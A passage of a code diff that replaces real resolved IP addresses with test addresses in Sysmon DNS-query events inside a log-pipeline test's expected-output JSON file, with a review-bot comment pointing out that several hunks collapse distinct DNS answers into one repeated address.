@@ -5675,7 +5675,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:199.187.193.166;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { 
@@ -5684,7 +5684,7 @@
 "ProcessId": "2736",
 "QueryName": "rtb-csync.smartadserver.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:199.187.193.166;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;",
+ "QueryResults": "type: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.604"
 },
@@ -5713,7 +5713,7 @@
 "@timestamp": "2021-05-05T15:30:51.707Z",
 "winlog": {
 "event_data": {
- "QueryResults": "type: 5 anycast.sc.iasds01.com;::ffff:199.166.0.200;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "type: 5 anycast.sc.iasds01.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.621",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -5745,7 +5745,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:199.166.0.200;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -5757,7 +5757,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sjedt.adsafeprotected.com;::ffff:104.244.38.20;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sjedt.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5771,7 +5771,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 sjedt.adsafeprotected.com;::ffff:104.244.38.20;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 sjedt.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.822", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5814,7 +5814,7 @@ "ProcessId": "2736", "QueryName": "status.thawte.com", "QueryStatus": "0", - "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;", + "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { 
@@ -5829,7 +5829,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" 
@@ -5841,7 +5841,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:38.134.110.101;::ffff:38.134.110.143;::ffff:38.134.110.141;::ffff:38.134.110.171;::ffff:38.134.110.177;::ffff:38.134.110.115;::ffff:38.134.110.104;::ffff:38.134.110.114;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
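Review bot: In the new QueryResults value of this hunk (EventRecordID 164, ads.stickyadstv.com) all eight previously distinct A-record answers become the same address, 89.160.20.156, so the expected document no longer represents a multi-answer DNS response with distinct resolved IPs; if the pipeline deduplicates answers into fields such as dns.resolved_ip or related.ip, the regenerated golden file silently stops covering that path. The same collapse appears in the hunks at -5849, -5933/-5951, -5994, -6004/-6028, -6049 and -6101/-6124, whereas the hunk at -5745 keeps each answer distinct (192.168.6.30, 192.168.14.30, ...). Consider giving each answer a different address from the supported subset in the raw test input and regenerating this expected file from it rather than editing the JSON by hand, so that event.original and winlog.event_data.QueryResults stay in step.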
@@ -5849,7 +5849,7 @@ "winlog": { "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:38.134.110.101;::ffff:38.134.110.143;::ffff:38.134.110.141;::ffff:38.134.110.171;::ffff:38.134.110.177;::ffff:38.134.110.115;::ffff:38.134.110.104;::ffff:38.134.110.114;", + "QueryResults": "type: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.860", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -5892,7 +5892,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -5905,7 +5905,7 @@ "version": 5, "time_created": "2019-07-18T03:34:06.051Z", "event_data": { - "QueryResults": "type: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;", + "QueryResults": "type: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.904", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -5933,7 +5933,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 